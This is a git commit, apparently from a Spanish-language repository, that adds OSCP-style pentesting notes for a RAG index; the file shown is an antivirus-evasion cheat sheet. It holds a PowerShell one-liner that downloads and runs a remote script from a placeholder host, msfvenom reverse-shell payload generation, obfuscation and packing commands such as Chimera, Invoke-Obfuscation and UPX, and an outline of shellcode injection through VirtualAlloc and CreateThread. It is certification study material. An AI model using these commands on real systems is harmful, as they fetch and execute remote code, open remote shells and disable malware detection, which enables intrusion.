saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
parent
12987539a4
commit
7e06ce46cf
76 changed files with 2682 additions and 8 deletions
28
nucleo/saber/conocimiento/08 - Avanzado/AV evasion.md
Normal file
28
nucleo/saber/conocimiento/08 - Avanzado/AV evasion.md
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
# AV evasion
|
||||
|
||||
> Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.
|
||||
|
||||
## PowerShell en memoria (no toca disco)
|
||||
```powershell
|
||||
IEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless
|
||||
powershell -ExecutionPolicy Bypass -File evasion.ps1
|
||||
powershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)
|
||||
```
|
||||
|
||||
## Generar y ofuscar
|
||||
```bash
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # → msfvenom
|
||||
python3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation
|
||||
./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables
|
||||
```
|
||||
|
||||
## Inyección directa (P/Invoke)
|
||||
Script PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** → ejecuta sin escribir un .exe al disco (evade el escaneo on-write).
|
||||
|
||||
## Otras tools
|
||||
- **Shellter** (inyecta en un .exe legítimo), **Veil**, **Nim/C# loaders**.
|
||||
- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.
|
||||
|
||||
> Nota OSCP: la evasión de AV está permitida (no es un escáner de vulns prohibido → Reglas de herramientas); rara vez hace falta en el examen, pero alguna máquina la pide.
|
||||
|
||||
Relacionado: Client-side attacks · msfvenom · Reverse shell · OSCP MOC
|
||||
Loading…
Add table
Add a link
Reference in a new issue